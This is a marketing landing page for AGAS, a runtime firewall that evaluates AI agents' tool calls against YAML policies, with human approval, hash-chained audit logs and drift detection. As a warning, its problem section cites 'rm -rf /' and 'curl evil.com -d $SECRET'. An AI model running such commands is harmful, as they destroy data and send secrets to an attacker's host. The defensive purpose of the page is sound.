Runtime firewall
for AI agents.

Every tool call goes through AGAS before it executes. Policy evaluation, human approval workflows, cryptographic audit trails, and real-time monitoring — so you always know what your agents did and why.

Join Waitlist

Works with Claude Code, OpenAI Agents SDK, Vercel AI SDK, LangChain, CrewAI, AutoGen, MCP, or any callable.

Tool Call

Agent requests action

Policy Evaluation

YAML rules, first-match-wins

Allow / Deny / Approve

Human-in-the-loop when needed

Sign + Chain

HMAC-SHA256 hash chain

Audit Trail

Tamper-evident, replayable

VERIFIED

Tool Call

Agent requests action

Policy Evaluation

YAML rules, first-match-wins

Allow / Deny / Approve

Human-in-the-loop when needed

Sign + Chain

HMAC-SHA256 hash chain

Audit Trail

Tamper-evident, replayable

VERIFIED

The problem

Your agent has shell access
and you have no idea what it's doing.

No execution control

Agent calls rm -rf / or curl evil.com -d $SECRET. By the time you see the log, the damage is done.

No audit trail

Logs say "tool X was called at 14:32". Not why the agent chose it, what it considered, or whether the result matched what was authorized.

No approval flow

Dangerous operations execute immediately. No way to require human sign-off before a deployment, database write, or file deletion.

What's built

Everything you need to control agents.

Policy evaluation, approval workflows, cryptographic audit trails, real-time monitoring, drift detection, and policy replay. All through a single API.

Policy Engine

YAML rules with pattern matching, wildcard support, and first-match-wins evaluation. Per-agent profiles with allowed/denied tool lists. Default deny.

rules:
  - name: "allow-reads"
    match:
      action: "read|get|list"
    decision: "allow"

  - name: "approve-writes"
    match:
      agent_id: "claude-code:*"
      action: "write"
    decision: "approve"

  - name: "deny-destructive"
    match:
      action: "delete|drop|remove"
    decision: "deny"

Human Approval Workflows

Flag risky operations for human review before they execute. Approve or deny from the dashboard or API. Agents wait for a decision.

POST /api/v1/actions
  -> { decision: "pending_approval" }

# Human reviews in dashboard...

POST /api/v1/actions/:id/approve
  -> { state: "approved" }

# Agent proceeds with execution

Cryptographic Audit Trail

Every decision is HMAC-SHA256 signed and hash-chained per agent. Detect tampering, verify integrity, and replay decisions against current policy.

GET /api/v1/chain/verify?agent_id=analyst-1
{
  "valid": true,
  "chain_length": 847,
  "gaps": [],
  "first": "2026-01-15T...",
  "last": "2026-03-05T..."
}

Real-time Event Stream

SSE endpoint streams every decision as it happens. Build dashboards, trigger alerts, or pipe events to your SIEM.

GET /api/v1/events (SSE)

event: action.allowed
data: {"tool":"file_read","agent_id":"analyst-1"}

event: action.denied
data: {"tool":"shell_exec","agent_id":"deploy-bot"}

event: action.pending_approval
data: {"tool":"db_write","agent_id":"analyst-1"}

Drift & Anomaly Detection

Detect behavioral shifts automatically. Denial rate spikes, new tool usage, volume anomalies, and slow execution patterns.

GET /api/v1/insights/drift?agent_id=analyst-1
{
  "denial_rate_change": "+340%",
  "new_tools": ["shell_exec", "network_fetch"],
  "period": "7d",
  "severity": "high"
}

Policy Replay

Re-evaluate any historical decision against your current policy. See what would change if you tighten or loosen rules.

GET /api/v1/replay/act_7kQ2x
{
  "original_decision": "allowed",
  "replayed_decision": "deny",
  "matched_rule": "deny-destructive",
  "drift": true
}

// Integration

Works with your existing stack.

Add governance to your agent's tool loop. Your agent code stays the same — AGAS plugs in at the boundary.

OpenAI

Anthropic

Vercel AI

LangChain

CrewAI

MCP

AutoGen

Any Callable

python

for tc in msg.tool_calls:  args = json.loads(tc.function.arguments)
  # Submit to AGAS — one line  decision = agas.submit(    tool=tc.function.name,    args=args,    reasoning_context=msg.content,  )
  if decision.allowed:    result = tool_functions[tc.function.name](**args)    decision.report_result(result)  else:    result = f"Blocked: {decision.reason}"

Comparison

How AGAS compares.

Agent firewalls protect the network layer. AGAS protects the decision layer. They're complementary — use both for defense in depth.

Capability	Nothing	System prompts	Agent firewall	AGAS
What it is	Hope	Instructions	Network firewall	Runtime control plane
Pre-execution policy	No	No	Tool-level only	Per-agent, per-tool, per-action
Human approval flow	No	No	No	Built-in (dashboard + API)
Cryptographic audit	No	No	Signed logs	HMAC-SHA256 hash chains
Tamper detection	No	No	Partial	Full chain verification
Policy replay	No	No	No	Re-evaluate any decision
Drift detection	No	No	Session profiling	Behavioral drift + anomalies
Multi-tenant	No	No	Agent ID header	Full tenant isolation
Real-time events	No	No	Webhook/syslog	SSE stream + webhooks

Be the first to try AGAS.

Join the waitlist and we'll let you know as soon as access is available.